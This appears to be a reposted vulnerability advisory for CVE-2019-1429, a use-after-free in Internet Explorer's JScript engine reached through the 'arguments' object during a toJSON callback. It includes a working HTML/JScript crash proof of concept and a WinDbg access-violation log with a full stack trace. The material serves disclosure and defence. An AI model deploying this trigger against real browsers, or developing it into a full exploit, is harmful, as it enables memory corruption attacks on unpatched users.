Microsoft Internet Explorer Use-After-Free

2019.11.22
Credit: Ivan Fratric
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 7.6/10
Impact Subscore: 10/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

IE: Use-after-free in JScript arguments during toJSON callback There is a use-after-free issue in JSCript (triggerable via Internet Explorer) where the members of the 'arguments' object aren't tracked by the garbage collector during the 'toJSON' callback. Thus, during the 'toJSON' callback, it is possible to assign a variable to the 'arguments' object, have it garbage-collected (as long as it is not referenced anywhere else) and still access it later. Note that, like in some previously reported JSCript issues, this is a use-after-free on a JSCript variable (VAR structure), so in order to trigger a crash, the entire block of variables must be freed. PoC for Internet Explorer is below. I tested it on multiple Windows version with the latest security patches applied. =========================================================== <!-- saved from url=(0014)about:internet --> <meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta> <script language=\"Jscript.Encode\"> var spray = new Array(); function F() { alert('callback'); // 2. Create a bunch of objects for (var i = 0; i < 20000; i++) spray[i] = new Object(); // 3. Store a reference to one of them in the arguments array // The arguments array isn't tracked by garbage collector arguments[0] = spray[5000]; // 4. Delete the objects and call the garbage collector // All JSCript variables get reclaimed... for (var i = 0; i < 20000; i++) spray[i] = 1; CollectGarbage(); // 5. But we still have reference to one of them in the // arguments array alert(arguments[0]); } // 1. Cause toJSON callback to fire var o = {toJSON:F} JSON.stringify(o); alert('done'); </script> =========================================================== Debug log: =========================================================== (1cf4.154): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000080 ebx=05ecc218 ecx=00000080 edx=00000001 esi=05f0c3c8 edi=05fb12e8 eip=6e25f52a esp=05ecc180 ebp=05ecc1b4 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 jscript!PrepareInvoke+0x12a: 6e25f52a 0fb707 movzx eax,word ptr [edi] ds:002b:05fb12e8=???? 0:009> k # ChildEBP RetAddr 00 05ecc1b4 6e262b75 jscript!PrepareInvoke+0x12a 01 05ecc2a8 6e2660ee jscript!VAR::InvokeByDispID+0x1c5 02 05ecc4a0 6e26244a jscript!CScriptRuntime::Run+0x2e4e 03 05ecc594 6e2622a1 jscript!ScrFncObj::CallWithFrameOnStack+0xaa 04 05ecc5ec 6e25bec9 jscript!ScrFncObj::Call+0x81 05 05ecc68c 6e262aed jscript!NameTbl::InvokeInternal+0x399 06 05ecc78c 6e2a862c jscript!VAR::InvokeByDispID+0x13d 07 05ecc800 6e2a8c2e jscript!GCProtectKeyAndCall+0xed 08 05ecc898 6e2a93ce jscript!JSONApplyFilters+0x125 09 05ecc90c 6e2ad9a2 jscript!JSONStringifyObject+0xac 0a 05ecc9b4 6e269e3a jscript!JsJSONStringify+0x382 0b 05ecca1c 6e25bec9 jscript!NatFncObj::Call+0xea 0c 05eccabc 6e25e476 jscript!NameTbl::InvokeInternal+0x399 0d 05eccc78 6e262aa5 jscript!VAR::InvokeByName+0x8f6 0e 05eccd70 6e2660ee jscript!VAR::InvokeByDispID+0xf5 0f 05eccf68 6e26244a jscript!CScriptRuntime::Run+0x2e4e 10 05ecd05c 6e2622a1 jscript!ScrFncObj::CallWithFrameOnStack+0xaa 11 05ecd0b4 6e257124 jscript!ScrFncObj::Call+0x81 12 05ecd170 6e257f75 jscript!CSession::Execute+0x314 13 05ecd1d0 6e256c83 jscript!COleScript::ExecutePendingScripts+0x2d5 14 05ecd274 6e2569b9 jscript!COleScript::ParseScriptTextCore+0x2c3 15 05ecd2a0 70209251 jscript!COleScript::ParseScriptText+0x29 16 05ecd2d8 70122a27 MSHTML!CActiveScriptHolder::ParseScriptText+0x51 17 05ecd348 70121fe2 MSHTML!CScriptCollection::ParseScriptText+0x182 18 05ecd434 701226ee MSHTML!CScriptData::CommitCode+0x312 19 05ecd4b0 7012153a MSHTML!CScriptData::Execute+0x1ba 1a 05ecd4d0 701e99b6 MSHTML!CHtmScriptParseCtx::Execute+0xaa 1b 05ecd524 70159c7d MSHTML!CHtmParseBase::Execute+0x186 1c 05ecd544 70159599 MSHTML!CHtmPost::Broadcast+0xfd 1d 05ecd66c 7017647d MSHTML!CHtmPost::Exec+0x339 1e 05ecd68c 70176376 MSHTML!CHtmPost::Run+0x3d 1f 05ecd6ac 70176308 MSHTML!PostManExecute+0x60 20 05ecd6c0 70176279 MSHTML!PostManResume+0x6f 21 05ecd6f0 70208447 MSHTML!CHtmPost::OnDwnChanCallback+0x39 22 05ecd708 7015be1d MSHTML!CDwnChan::OnMethodCall+0x27 23 05ecd780 702f1207 MSHTML!GlobalWndOnMethodCall+0x1bd 24 05ecd7d0 7015c5a2 MSHTML!GlobalWndProc_SEH+0x317 25 05ecd7ec 7562624b MSHTML!GlobalWndProc+0x52 26 05ecd818 756174dc USER32!_InternalCallWinProc+0x2b 27 05ecd8fc 7561661b USER32!UserCallWinProcCheckWow+0x3ac 28 05ecd970 756163f0 USER32!DispatchMessageWorker+0x21b 29 05ecd97c 717e6456 USER32!DispatchMessageW+0x10 2a 05ecfb0c 717e73e3 IEFRAME!CTabWindow::_TabWindowThreadProc+0xa36 2b 05ecfbcc 7223df6c IEFRAME!LCIETab_ThreadProc+0x403 2c 05ecfbe4 7130289d msIso!_IsoThreadProc_WrapperToReleaseScope+0x1c 2d 05ecfc1c 75520419 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d 2e 05ecfc2c 7789662d KERNEL32!BaseThreadInitThunk+0x19 2f 05ecfc88 778965fd ntdll!__RtlUserThreadStart+0x2f 30 05ecfc98 00000000 ntdll!_RtlUserThreadStart+0x1b =========================================================== This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. Related CVE Numbers: CVE-2019-1429. Found by: ifratric@google.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top